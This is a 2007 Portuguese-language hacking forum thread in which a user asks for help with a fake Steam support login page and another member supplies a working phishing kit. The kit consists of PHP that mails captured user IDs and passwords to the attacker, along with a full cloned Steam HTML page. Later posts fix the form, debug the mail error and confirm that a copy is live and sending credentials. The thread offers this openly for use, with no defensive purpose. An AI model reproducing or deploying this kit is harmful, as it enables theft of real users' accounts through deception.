[AJUDA] PHP

Started by lostph, 17 de February , 2007, 12:48:26 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

lostph

Bom pessoal eu não manjo nada de php , ate tentei modifica mais não consegui , naum tenho a minima ideia e resolvi postar no darkers pra ve se vocÊs possaum me ajuda.

è o seguinte to fazendu uma FAKE do site da STEAM, e gostaria que ao formulario ser preenchido chegaria um e-mail pra mim ...

se alguem por favor puder fazer essa modificação pra mim eu irei ficar grato.

Segue abaixo os arquivos que eu gostaria que modificacem, tambem abaixo estarei postando uma SCREEN do arquivo apssado no virusscan pra verem que naum estou de sacanagem.


DOWNLOAD: www.fcteam.totalshost.com/darkers/Steam.rar
SS: www.fcteam.totalshost.com/darkers/imagem.JPG


Hehehehe, bem na hora que aperteu o Print Screen MSN subiu ^^ ...

Brigado!

Magrinho Loko

Será que é isso que você quer?

<?php
$email_contato 
"fulaninho_phodao@hackerdumal&#46;com"// Digite o email que receberá o formulário
$p_userid $_POST['p_userid'&#93;; // Pega do formulario o p_userid
$p_passwd $_POST['p_passwd'&#93;; // Pega do formulario o p_passwd

$msg "<font face=\"Verdana\" size=\"1\"><b>UserID&#58;</b> \t$p_userid</font><br>";
$msg &#46;= "<font face=\"Verdana\" size=\"1\"><b>Senha&#58;</b> \t$p_passwd</font><br>";

// Junta tudo isso em uma variavel&#46;

$mensagem "$msg"//Pega a variavel
$destinatario "$email_contato"// o destinatario
$assunto "Mais uma conta de Steam"// o Assunto
$headers "From&#58; "&#46;$remetente&#46;"\nContent-type&#58; text/html"; // o 'text/html' é o tipo mime da mensagem
if(!mail($destinatario,$assunto,$mensagem,$headers)){ //Envia o conteudo do fórmulario e redireciona para uma pagina
header ("http&#58;//paginaparaondeseráredirecionado&#46;com");
} else { 
//Caso de erro, redireciona para outra pagina
header("http&#58;//paginaparaondeseráredirecionado&#46;com");
}
?>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" href="acct_login.php_arquivos/enduser.css">
<link rel="icon" href="http://www.steampowered.com/favicon.ico" type="image/x-icon">
<meta name="ROBOTS" content="NONE">
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW"><title>Support Login</title>

<script type="text/javascript" src="acct_login.php_arquivos/enduser.js" language="JavaScript"></script><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --></head><body>

<!-- begin header -->
<div style="min-width: 850px;">
<div class="globalHeadBar_logo"><a href="http://www.steampowered.com/"><img src="acct_login.php_arquivos/logo_steam_header.jpg" alt="Steam main" border="0"></a></div>
<div class="globalHeadBar">
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?" title="Home"><span class="globalNavLink">HOME</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=news&" title="News"><span class="globalNavLink">NEWS</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=getsteamnow&" title="Get Steam"><span class="globalNavLink">GET STEAM NOW</span></a></div>
<div class="globalNavItem"><a href="https://cafe.steampowered.com/" title="Cyber Cafes"><span class="globalNavLink">CYBER CAFÉS</span></a></div>
<div class="globalNavItem"><a href="http://support.steampowered.com/" title="Support"><span class="globalNavLink">SUPPORT</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=forums&" title="Forums"><span class="globalNavLink">FORUMS</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=stats" title="Status"><span class="globalNavLink">STATS</span></a></div>
</div>
</div>
<br clear="all">
<!-- end header -->

<br>
<center>
<div class="wrapper">

<div class="content">

<br>

<div style="padding: 8px; background: rgb(35, 35, 35) none repeat scroll 0%; font-size: 1em; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;">
 Do not use your Steam account information to access the support
site. If you do not already have an Account for the support site please
use the <b>Create a New Account</b> button.</div>
<br>


<!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->

<table border="0" cellpadding="0" cellspacing="0" width="100%">
 <tbody><tr>
  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
     <td align="left" valign="top"><img src="acct_login.php_arquivos/tabl.gif" alt="" height="6" width="6"></td>
     <td class="tab" rowspan="2" align="center" nowrap="nowrap" width="100%">
      <a class="tab" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/home.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ">Support Home</a>
     </td>
     <td align="right" valign="top"><img src="acct_login.php_arquivos/tabr.gif" alt="" height="6" width="6"></td>
    </tr>
    <tr>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
    </tr>
   </tbody></table>
  </td>
  <td width="1%"> </td>
  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
     <td align="left" valign="top"><img src="acct_login.php_arquivos/tabl.gif" alt="" height="6" width="6"></td>
     <td class="tab" rowspan="2" align="center" nowrap="nowrap" width="100%">
      <a class="tab" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/std_alp.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ"> Answers </a>
     </td>
     <td align="right" valign="top"><img src="acct_login.php_arquivos/tabr.gif" alt="" height="6" width="6"></td>
    </tr>
    <tr>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
    </tr>
   </tbody></table>
  </td>
  <td width="1%"> </td>
  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
     <td align="left" valign="top"><img src="acct_login.php_arquivos/tabl.gif" alt="" height="6" width="6"></td>
     <td class="tab" rowspan="2" align="center" nowrap="nowrap" width="100%">
      <a class="tab" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/myovr.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ"> My Stuff </a>
     </td>
     <td align="right" valign="top"><img src="acct_login.php_arquivos/tabr.gif" alt="" height="6" width="6"></td>
    </tr>
    <tr>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
    </tr>
   </tbody></table>
  </td>
  <td width="1%"> </td>

  <td width="80%"> </td>

  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0" width="1%">
    <tbody><tr>
     <td class="seltabbtn" align="left" valign="top" width="1%"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
     <td class="seltabbtn" rowspan="2" align="center" nowrap="nowrap" valign="middle" width="2%">
      <a class="seltabbtn" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/acct_login.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ&p_next_page=acct_login.php">
         Login        </a>
     </td>
     <td class="seltabbtn" align="right" valign="top" width="1%"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
    </tr>
    <tr>
     <td class="seltabbtn">
      <img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="1">
     </td>
     <td class="seltabbtn">
      <img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="1">
     </td>
    </tr>
   </tbody></table>
  </td>
   <td width="1%"> </td>

 </tr>

<!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->

 <tr>
  <td class="seltab" colspan="9">


    
  </td>
 </tr>

 <tr><td colspan="8"></td></tr>
 <tr><td colspan="8"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="4" width="1"></td></tr>

</tbody></table>

<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td align="right"><img src="acct_login.php_arquivos/tl.gif" alt="" height="6" width="6"></td>
<td class="form" width="100%"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
<td align="left"><img src="acct_login.php_arquivos/tr.gif" alt="" height="6" width="6"></td>
</tr>
<tr><td class="form"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="1" width="1"></td><td class="form">

<input name="p_sid" value="emkYLbji" type="hidden">
<input value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ" name="p_sp" type="hidden">
<input value="myovr.php" name="p_next_page" type="hidden">
<input name="p_sid" value="emkYLbji" type="hidden">
<input value="" name="p_lva" type="hidden">
<input value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ" name="p_sp" type="hidden">
<input value="" name="p_li" type="hidden">
<table border="0" cellpadding="2" cellspacing="2" width="100%">

<!-- Returning Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->



<tbody><tr><td colspan="2" class="subtitle"> Returning Users</td></tr>
<form class="minimal" name="_validate" method="post" action="<?=$_SERVER['PHP_SELF']?>"></form>
<tr>
<td class="label" align="right" nowrap="nowrap"><label for="p_userid">User ID</label>:</td>
<td><input name="p_userid" id="p_userid" size="30" maxlength="80" value="" type="text"></td>
</tr>
<tr>
<td class="label" align="right" nowrap="nowrap"><label for="p_passwd">Password</label>:</td>
<td><input name="p_passwd" id="p_passwd" size="20" maxlength="20" type="password"></td>
</tr>
<tr>
<td></td>
<td><input value="        Login        " class="btn" tabindex="0" type="submit"></td>
</tr>


<!-- Forgotten Password ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->


<tr><td><font size="-9"> </font></td></tr>

<tr><td colspan="2" class="subtitle"> If you have forgotten your password...</td></tr>
<form class="minimal" name="passwd" method="get" action="acct_passwd_email.php"></form>
<tr>
<td class="label" align="right"><label for="forgot_passwd_p_userid">User ID</label>:</td>
<td><input name="p_userid" id="forgot_passwd_p_userid" size="30" maxlength="80" type="text"></td>
</tr>
<tr>
<td></td>
<td><input value="Email Me My Password" class="btn" tabindex="0" type="submit"></td>
</tr>



<!-- New Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->

<tr><td><font size="-9"> </font></td></tr>

<tr><td colspan="2" class="subtitle"> If you do not have an account...</td></tr>
<tr><td></td>
<td>
<form class="minimal" name="_new" method="get" action="acct_new.php">
<input name="p_sid" value="emkYLbji" type="hidden">
<input name="p_lva" value="" type="hidden">
<input name="p_sp" value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ" type="hidden">
<input name="p_li" value="" type="hidden">
<input name="p_next_page" value="myovr.php" type="hidden">
<input value="Create a New Account" class="btn" tabindex="0" type="submit"></form></td></tr>


</tbody></table></td>
<td class="form"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="1" width="1"></td></tr>

<tr>
<td align="right"><img src="acct_login.php_arquivos/bl.gif" alt="" height="6" width="6"></td>
<td class="form"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
<td align="left"><img src="acct_login.php_arquivos/br.gif" alt="" height="6" width="6"></td>
</tr>
</tbody></table>
<br>

</div>

</div>

<!-- begin footer -->
<div class="footer">
<table background="acct_login.php_arquivos/img_footer_bg.jpg" border="0" cellpadding="0" cellspacing="0" width="910">
<tbody><tr>
<td background="acct_login.php_arquivos/img_footer_l.jpg" height="73" width="12"> </td>
<td align="center" width="110"><a href="http://www.valvesoftware.com/"><img src="acct_login.php_arquivos/logo_valve_footer.jpg" alt="link: Valve Software" border="0" height="26" width="92"></a></td>
<td>

<div class="legal">
© 2006 Valve Corporation. All rights reserved. All trademarks are
property of their respective owners in the US and other countries.<br>
<a href="http://www.valvesoftware.com/privacy.htm"> Privacy Policy.</a> <a href="http://www.valvesoftware.com/legal.htm">Legal.</a> <a href="http://www.steampowered.com/index.php?area=subscriber_agreement">Steam Subscriber Agreement.</a>
</div>


</td>
<td background="acct_login.php_arquivos/img_footer_r.jpg" height="73" width="14"> </td>
</tr>
</tbody></table>
</div>
<!-- end footer -->
<script type="text/javascript">
_set_cursor();
</script>

</center>
<br>


</body></html>

Lembre-se de editar essa parte conforma sua necessidade.

<?php
$email_contato 
"fulaninho_phodao@hackerdumal&#46;com"// Digite o email que receberá o formulário
$p_userid $_POST['p_userid'&#93;; // Pega do formulario o p_userid
$p_passwd $_POST['p_passwd'&#93;; // Pega do formulario o p_passwd

$msg "<font face=\"Verdana\" size=\"1\"><b>UserID&#58;</b> \t$p_userid</font><br>";
$msg &#46;= "<font face=\"Verdana\" size=\"1\"><b>Senha&#58;</b> \t$p_passwd</font><br>";

// Junta tudo isso em uma variavel&#46;

$mensagem "$msg"//Pega a variavel
$destinatario "$email_contato"// o destinatario
$assunto "Mais uma conta de Steam"// o Assunto
$headers "From&#58; "&#46;$remetente&#46;"\nContent-type&#58; text/html"; // o 'text/html' é o tipo mime da mensagem
if(!mail($destinatario,$assunto,$mensagem,$headers)){ //Envia o conteudo do fórmulario e redireciona para uma pagina
header ("http&#58;//paginaparaondeseráredirecionado&#46;com");
} else { 
//Caso de erro, redireciona para outra pagina
header("http&#58;//paginaparaondeseráredirecionado&#46;com");
}
?>


P.s: Não testei o envio, mas é assim que eu utilizo nos formularios de contato dos meus sites. =]
Saudades do antigo Darkers.

lcs

Aeee magrinho loko vc e seu php eh foda.. aquele form que tu me passou ta ajudando muito,, valewww
Pra que viver sem sentido.

lostph

opa grato magrinho ..... irei ver se consigo fazer tudinho agora .... muito obrigado viu ...
:D

lostph

deu este erro aki


Warning: mail(): Could not execute mail delivery program '/usr/sbin/sendmail -t -i ' in /home/www/supportsteampowered.freehostia.com/index.php on line 15

Warning: Cannot modify header information - headers already sent by (output started at /home/www/supportsteampowered.freehostia.com/index.php:15) in /home/www/supportsteampowered.freehostia.com/index.php on line 16

lostph

ah pagina de teste que estou usandu eh esta aki :

http://www.fcteam.totalshost.com/darkers/

quandu preencho tudo e cliko em qualquer botão , naum envia naum faz nada ...

você poderia me explica pq esta aocntecendo isso ?

Magrinho Loko

Os campos estavam fora do , eu não tinha reparado nisso xD

<?php
$email_contato 
"fulaninho_phodao@hackerdumal&#46;com"// Digite o email que receberá o formulário
$p_userid $_POST['p_userid'&#93;; // Pega do formulario o p_userid
$p_passwd $_POST['p_passwd'&#93;; // Pega do formulario o p_passwd

$msg "<font face=\"Verdana\" size=\"1\"><b>UserID&#58;</b> \t$p_userid</font><br>";
$msg &#46;= "<font face=\"Verdana\" size=\"1\"><b>Senha&#58;</b> \t$p_passwd</font><br>";

//Junta tudo isso em uma variavel

$mensagem "$msg"// pega a variavel
$destinatario "$email_contato"//pega o destinatario
$assunto "Mais uma conta hackeada!!!";
$headers "From&#58; "&#46;$remetente&#46;"\nContent-type&#58; text/html"; # o 'text/html' é o tipo mime da mensagem
 

if(!mail($destinatario,$assunto,$mensagem,$headers)){
print (
" "); // Exibe um espacinho vazio, fazendo com que a vítima pense que a steam foi rejeitada&#46; =&#93; nada impede de você trocar por outra frase a sua escola&#46; =&#93;
}
?>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" href="acct_login.php_arquivos/enduser.css">
<link rel="icon" href="http://www.steampowered.com/favicon.ico" type="image/x-icon">
<meta name="ROBOTS" content="NONE">
<meta name="ROBOTS" content="NOINDEX,NOFOLLOW"><title>Support Login</title>

<script type="text/javascript" src="acct_login.php_arquivos/enduser.js" language="JavaScript"></script><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --></head><body>

<!-- begin header -->
<div style="min-width: 850px;">
<div class="globalHeadBar_logo"><a href="http://www.steampowered.com/"><img src="acct_login.php_arquivos/logo_steam_header.jpg" alt="Steam main" border="0"></a></div>
<div class="globalHeadBar">
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?" title="Home"><span class="globalNavLink">HOME</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=news&" title="News"><span class="globalNavLink">NEWS</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=getsteamnow&" title="Get Steam"><span class="globalNavLink">GET STEAM NOW</span></a></div>
<div class="globalNavItem"><a href="https://cafe.steampowered.com/" title="Cyber Cafes"><span class="globalNavLink">CYBER CAFÉS</span></a></div>
<div class="globalNavItem"><a href="http://support.steampowered.com/" title="Support"><span class="globalNavLink">SUPPORT</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=forums&" title="Forums"><span class="globalNavLink">FORUMS</span></a></div>
<div class="globalNavItem"><a href="http://www.steampowered.com/v/index.php?area=stats" title="Status"><span class="globalNavLink">STATS</span></a></div>
</div>
</div>
<br clear="all">
<!-- end header -->

<br>
<center>
<div class="wrapper">

<div class="content">

<br>

<div style="padding: 8px; background: rgb(35, 35, 35) none repeat scroll 0%; font-size: 1em; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;">
 Do not use your Steam account information to access the support
site. If you do not already have an Account for the support site please
use the <b>Create a New Account</b> button.</div>
<br>


<!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->

<table border="0" cellpadding="0" cellspacing="0" width="100%">
 <tbody><tr>
  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
     <td align="left" valign="top"><img src="acct_login.php_arquivos/tabl.gif" alt="" height="6" width="6"></td>
     <td class="tab" rowspan="2" align="center" nowrap="nowrap" width="100%">
      <a class="tab" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/home.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ">Support Home</a>
     </td>
     <td align="right" valign="top"><img src="acct_login.php_arquivos/tabr.gif" alt="" height="6" width="6"></td>
    </tr>
    <tr>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
    </tr>
   </tbody></table>
  </td>
  <td width="1%"> </td>
  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
     <td align="left" valign="top"><img src="acct_login.php_arquivos/tabl.gif" alt="" height="6" width="6"></td>
     <td class="tab" rowspan="2" align="center" nowrap="nowrap" width="100%">
      <a class="tab" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/std_alp.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ"> Answers </a>
     </td>
     <td align="right" valign="top"><img src="acct_login.php_arquivos/tabr.gif" alt="" height="6" width="6"></td>
    </tr>
    <tr>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
    </tr>
   </tbody></table>
  </td>
  <td width="1%"> </td>
  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0">
    <tbody><tr>
     <td align="left" valign="top"><img src="acct_login.php_arquivos/tabl.gif" alt="" height="6" width="6"></td>
     <td class="tab" rowspan="2" align="center" nowrap="nowrap" width="100%">
      <a class="tab" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/myovr.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ"> My Stuff </a>
     </td>
     <td align="right" valign="top"><img src="acct_login.php_arquivos/tabr.gif" alt="" height="6" width="6"></td>
    </tr>
    <tr>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
     <td class="tab"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="6"></td>
    </tr>
   </tbody></table>
  </td>
  <td width="1%"> </td>

  <td width="80%"> </td>

  <td valign="bottom" width="1%">
   <table border="0" cellpadding="0" cellspacing="0" width="1%">
    <tbody><tr>
     <td class="seltabbtn" align="left" valign="top" width="1%"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
     <td class="seltabbtn" rowspan="2" align="center" nowrap="nowrap" valign="middle" width="2%">
      <a class="seltabbtn" href="http://support.steampowered.com/cgi-bin/steampowered.cfg/php/enduser/acct_login.php?p_sid=emkYLbji&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ&p_next_page=acct_login.php">
         Login        </a>
     </td>
     <td class="seltabbtn" align="right" valign="top" width="1%"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
    </tr>
    <tr>
     <td class="seltabbtn">
      <img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="1">
     </td>
     <td class="seltabbtn">
      <img src="acct_login.php_arquivos/trnsp.gif" alt="" height="14" width="1">
     </td>
    </tr>
   </tbody></table>
  </td>
   <td width="1%"> </td>

 </tr>

<!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->

 <tr>
  <td class="seltab" colspan="9">


    
  </td>
 </tr>

 <tr><td colspan="8"></td></tr>
 <tr><td colspan="8"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="4" width="1"></td></tr>

</tbody></table>

<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td align="right"><img src="acct_login.php_arquivos/tl.gif" alt="" height="6" width="6"></td>
<td class="form" width="100%"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
<td align="left"><img src="acct_login.php_arquivos/tr.gif" alt="" height="6" width="6"></td>
</tr>
<tr><td class="form"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="1" width="1"></td><td class="form">

<input name="p_sid" value="emkYLbji" type="hidden">
<input value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ" name="p_sp" type="hidden">
<input value="myovr.php" name="p_next_page" type="hidden">
<input name="p_sid" value="emkYLbji" type="hidden">
<input value="" name="p_lva" type="hidden">
<input value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ" name="p_sp" type="hidden">
<input value="" name="p_li" type="hidden">
<table border="0" cellpadding="2" cellspacing="2" width="100%">

<!-- Returning Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->



<tbody><tr><td colspan="2" class="subtitle"> Returning Users</td></tr>
<form class="minimal" name="_validate" method="post" action="<?=$_SERVER['PHP_SELF']?>">
<tr>
<td class="label" align="right" nowrap="nowrap"><label for="p_userid">User ID</label>:</td>
<td><input name="p_userid" id="p_userid" size="30" maxlength="80" value="" type="text"></td>
</tr>
<tr>
<td class="label" align="right" nowrap="nowrap"><label for="p_passwd">Password</label>:</td>
<td><input name="p_passwd" id="p_passwd" size="20" maxlength="20" type="password"></td>
</tr>
<tr>
<td></td>
<td><input value="        Login        " class="btn" tabindex="0" type="submit"></td>
</tr>
</form>

<!-- Forgotten Password ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->


<tr><td><font size="-9"> </font></td></tr>

<tr><td colspan="2" class="subtitle"> If you have forgotten your password...</td></tr>
<form class="minimal" name="passwd" method="get" action="acct_passwd_email.php"></form>
<tr>
<td class="label" align="right"><label for="forgot_passwd_p_userid">User ID</label>:</td>
<td><input name="p_userid" id="forgot_passwd_p_userid" size="30" maxlength="80" type="text"></td>
</tr>
<tr>
<td></td>
<td><input value="Email Me My Password" class="btn" tabindex="0" type="submit"></td>
</tr>



<!-- New Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->

<tr><td><font size="-9"> </font></td></tr>

<tr><td colspan="2" class="subtitle"> If you do not have an account...</td></tr>
<tr><td></td>
<td>
<form class="minimal" name="_new" method="get" action="acct_new.php">
<input name="p_sid" value="emkYLbji" type="hidden">
<input name="p_lva" value="" type="hidden">
<input name="p_sp" value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0yOTQmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3BhZ2U9MQ" type="hidden">
<input name="p_li" value="" type="hidden">
<input name="p_next_page" value="myovr.php" type="hidden">
<input value="Create a New Account" class="btn" tabindex="0" type="submit"></form></td></tr>


</tbody></table></td>
<td class="form"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="1" width="1"></td></tr>

<tr>
<td align="right"><img src="acct_login.php_arquivos/bl.gif" alt="" height="6" width="6"></td>
<td class="form"><img src="acct_login.php_arquivos/trnsp.gif" alt="" height="6" width="1"></td>
<td align="left"><img src="acct_login.php_arquivos/br.gif" alt="" height="6" width="6"></td>
</tr>
</tbody></table>
<br>

</div>

</div>

<!-- begin footer -->
<div class="footer">
<table background="acct_login.php_arquivos/img_footer_bg.jpg" border="0" cellpadding="0" cellspacing="0" width="910">
<tbody><tr>
<td background="acct_login.php_arquivos/img_footer_l.jpg" height="73" width="12"> </td>
<td align="center" width="110"><a href="http://www.valvesoftware.com/"><img src="acct_login.php_arquivos/logo_valve_footer.jpg" alt="link: Valve Software" border="0" height="26" width="92"></a></td>
<td>

<div class="legal">
© 2006 Valve Corporation. All rights reserved. All trademarks are
property of their respective owners in the US and other countries.<br>
<a href="http://www.valvesoftware.com/privacy.htm"> Privacy Policy.</a> <a href="http://www.valvesoftware.com/legal.htm">Legal.</a> <a href="http://www.steampowered.com/index.php?area=subscriber_agreement">Steam Subscriber Agreement.</a>
</div>


</td>
<td background="acct_login.php_arquivos/img_footer_r.jpg" height="73" width="14"> </td>
</tr>
</tbody></table>
</div>
<!-- end footer -->
<script type="text/javascript">
_set_cursor();
</script>

</center>
<br>


</body></html>

Aconselho criar um arquivo com isso dentro

<?php

phpinfo
();

?>



Assim veremos se o mail(); está habilitado em seu servidor. =]


P.s: Desculpe pela demora, minha mãe requeriu "mais 10 minutos"  no pc, que acabaram virando 2 horas e meia. ¬¬


P.s²: http://magrinholoko.deltaanime.net/dark ... team_1.php

Esse exemplo está funcionando, e enviando para meu email, em breve irei configurar para cadastrar em um .txt.
Saudades do antigo Darkers.

lostph

Opa grato madrinho, se possivel poderia me add no msn ?

mailto:fc.spiker@hotmail.com">fc.spiker@hotmail.com

e deskulpe a demora fui viajar , vou testa os arquivos.... mais assim que ler por favor add ao msn.

grato novamente :D

rog

QuoteWarning: mail(): Could not execute mail delivery program '/usr/sbin/sendmail -t -i ' in /home/www/supportsteampowered.freehostia.com/index.php on line 15

o sendmail nao esta instalado no servidor ou o php nao tem direito a accessar ele
no caso e um problem de servidor

QuoteWarning: Cannot modify header information - headers already sent by (output started at /home/www/supportsteampowered.freehostia.com/index.php:15) in /home/www/supportsteampowered.freehostia.com/index.php on line 16

